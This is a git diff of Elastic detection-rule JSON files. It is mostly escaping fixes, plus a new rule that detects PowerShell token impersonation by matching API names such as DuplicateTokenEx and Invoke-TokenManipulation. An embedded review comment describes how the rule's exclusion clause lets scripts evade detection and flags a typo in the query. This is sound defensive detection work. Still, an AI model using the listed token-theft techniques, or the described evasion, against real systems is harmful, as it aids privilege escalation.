Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n", "references": [ "https://github.com/AzAgarampur/byeintegrity-uac" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", 
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -94,7 +94,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_102.json b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_102.json
index ef7e22cf936..733c935b549 100644
--- a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_102.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_103.json b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_103.json
index 2f6d8ee7cdc..3eb2b0c9fdf 100644
--- a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_103.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_104.json b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_104.json
index 4544da7d5f9..c0c1482b96b 100644
--- a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_104.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_205.json b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_205.json
index 811ca8ac708..cc8ad0d9dda 100644
--- a/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/119c8877-8613-416d-a98a-96b6664ee73a_205.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_10.json b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_10.json
new file mode 100644
index 00000000000..2ce48024ceb
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_10.json
@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects scripts that contain PowerShell functions, structures, or Windows API functions related to token impersonation/theft. Attackers may duplicate then impersonate another user's token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Token Impersonation Capabilities", + "note": "## Triage and analysis\n\n### Investigating PowerShell Script with Token Impersonation Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAdversaries can abuse PowerShell to perform token impersonation, which involves duplicating and impersonating another user's token to escalate privileges and bypass access controls. This rule identifies scripts containing PowerShell functions, structures, or Windows API functions related to token impersonation/theft.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine PowerShell process creation and script block logs to identify command line arguments or hardcoded information that can indicate which user was the target of the impersonation.\n- Investigate any abnormal behavior by the subject process (PowerShell), such as network connections, registry or file modifications, and any spawned child processes.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account 
LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Regular users should not need to impersonate other users, which makes false positives unlikely. 
In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related Rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"Invoke-TokenManipulation\" or\n \"ImpersonateNamedPipeClient\" or\n \"NtImpersonateThread\" or\n (\n \"STARTUPINFOEX\" and\n \"UpdateProcThreadAttribute\"\n ) or\n (\n \"AdjustTokenPrivileges\" and\n \"SeDebugPrivilege\"\n ) or\n (\n (\"DuplicateToken\" or\n \"DuplicateTokenEx\") and\n (\"SetThreadToken\" or\n \"ImpersonateLoggedOnUser\" or\n \"CreateProcessWithTokenW\" or\n \"CreatePRocessAsUserW\" or\n \"CreateProcessAsUserA\")\n ) \n ) and\n not (\n user.id:(\"S-1-5-18\" or \"S-1-5-19\" or \"S-1-5-20\") and\n file.directory: \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\"\n ) and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n )\n", + "references": [ + "https://github.com/decoder-it/psgetsystem", + "https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/Get-System.ps1", + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-MS16032.ps1", + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": 
"powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "11dd9713-0ec6-4110-9707-32daae1ee68c", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.001", + "name": "Token Impersonation/Theft", + "reference": "https://attack.mitre.org/techniques/T1134/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + 
"type": "query", + "version": 10 + }, + "id": "11dd9713-0ec6-4110-9707-32daae1ee68c_10", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_4.json b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_4.json index 562916ddfeb..aaa8cbbaf2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_4.json +++ b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_4.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "11dd9713-0ec6-4110-9707-32daae1ee68c", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", 
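Review bot: The trailing exclusion `not powershell.file.script_block_text : ("sentinelbreakpoints" and "Set-PSBreakpoint" and "PowerSploitIndicators")` in the new rule's `query` tests strings inside the script body itself, so any script that carries those three tokens — a comment is enough — is dropped before the token-impersonation indicators above it are considered; because that content is under the script author's control, this is an evasion path rather than a tuning filter. Pin the carve-out to the process or account that legitimately emits it, as the Defender ATP carve-out already does with `user.id` and `file.directory`, or move it out of the query into a rule exception. Separately, `"CreatePRocessAsUserW"` in the DuplicateToken branch has a stray capital R; `powershell.file.script_block_text` is declared as type `unknown` in `required_fields`, and if it is matched case-sensitively that term never fires, so it should read `"CreateProcessAsUserW"`. The guide's "searching for login events (for example, 4624) to the target host after the registry modification" (this rule has no registry component) and the setup's "with with" read as copy-through from other rules and should be corrected.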
@@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_5.json b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_5.json index 321a7caba07..d67f0594b1e 100644 --- a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_5.json +++ b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_5.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "11dd9713-0ec6-4110-9707-32daae1ee68c", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", 
@@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_6.json b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_6.json index a9f4619fef4..7228fc17d5d 100644 --- a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_6.json +++ b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_6.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "11dd9713-0ec6-4110-9707-32daae1ee68c", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", 
@@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_7.json b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_7.json index f16193a875b..f7f7fd5610c 100644 --- a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_7.json +++ b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_7.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "11dd9713-0ec6-4110-9707-32daae1ee68c", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", 
@@ -88,7 +88,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_8.json b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_8.json
index d61e65796a9..53916906c5a 100644
--- a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_8.json
+++ b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_8.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "11dd9713-0ec6-4110-9707-32daae1ee68c",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -88,7 +88,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_9.json b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_9.json
index fc9c7f63198..a240932971d 100644
